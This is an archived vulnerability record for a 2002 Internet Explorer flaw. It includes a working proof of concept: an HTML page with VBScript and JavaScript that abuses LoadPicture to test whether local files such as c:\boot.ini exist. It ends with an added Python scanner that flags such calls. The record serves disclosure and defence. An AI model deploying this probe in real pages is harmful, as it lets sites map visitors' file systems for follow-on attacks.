Vendor: Internet Explorer
By: SecurityFocus
CVSS: 7.5 (HIGH)
Vulnerability Type: File Enumeration
CWE: 200
Product Name: Internet Explorer
Affected Version From: Internet Explorer 5.0
Affected Version To: Internet Explorer 6.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Internet Explorer File Enumeration Vulnerability

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

Mitigation:

Ensure that the latest version of Internet Explorer is installed and that all security patches are applied.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9611/info

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

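<script language="vbscript">

' Wrapper so the JavaScript below can call LoadPicture on the supplied path.
Sub loadIt(filename)
    LoadPicture(filename)
End Sub

</script>

<script language="javascript">

// Calls the VBScript wrapper and inspects the error number it raises.
function doIt(form) {
    // Declared up front so the comparison below still works when no error is raised.
    var result = 0;

    try {
        loadIt(form.filename.value);
    } catch (e) {
        result = e.number;
    }

    // The PoC treats error number -2146827856 as "file not found";
    // any other outcome is reported as "file exists".
    if (result != -2146827856) {
        alert('file exists');
    } else {
        alert('file does not exist');
    }
}
</script>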
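
A defensive check for the pattern shown above, added here as an example and not part of the original advisory or of any vendor tool: it scans HTML for VBScript blocks that call LoadPicture with a variable or a local-path literal, which a content filter or triage script can flag. The class and function names and the sample markup are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# LoadPicture call, with or without parentheses; captures the first argument token.
LOADPICTURE = re.compile(r'\bLoadPicture\b[ \t]*\(?[ \t]*([^\s,()]+)', re.I)
# String literal that names a local drive, a UNC share or a file: URL.
LOCAL_LITERAL = re.compile(r'^"(?:[A-Za-z]:[\\/]|\\\\|file:)', re.I)

class VBScriptCollector(HTMLParser):
    """Collects the bodies of <script> blocks declared as VBScript."""
    def __init__(self):
        super().__init__()
        self.blocks, self._in_vbs = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = {k: (v or "").lower() for k, v in attrs}
            self._in_vbs = "vbscript" in a.get("language", "") + a.get("type", "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_vbs = False

    def handle_data(self, data):
        if self._in_vbs:
            self.blocks.append(data)

def scan(html):
    """Return (argument, reason) findings for LoadPicture calls in VBScript blocks."""
    collector = VBScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for block in collector.blocks:
        for m in LOADPICTURE.finditer(block):
            arg = m.group(1)
            if LOCAL_LITERAL.match(arg):
                findings.append((arg, "local path literal"))
            elif not arg.startswith('"'):
                findings.append((arg, "variable argument"))
    return findings

# Constructed sample: the wrapper shape from this page, a benign relative image
# load, a hard-coded local path, and a JavaScript block that must be ignored.
SAMPLE = r'''<script language="vbscript">
Sub loadIt(filename)
LoadPicture(filename)
End Sub
Set logo = LoadPicture("logo.gif")
Set probe = LoadPicture("c:\boot.ini")
</script>
<script language="javascript">var note = "LoadPicture(x)";</script>'''
```

`scan(SAMPLE)` reports the variable-argument call and the hard-coded `c:\boot.ini` literal, and ignores the relative image load and the JavaScript block.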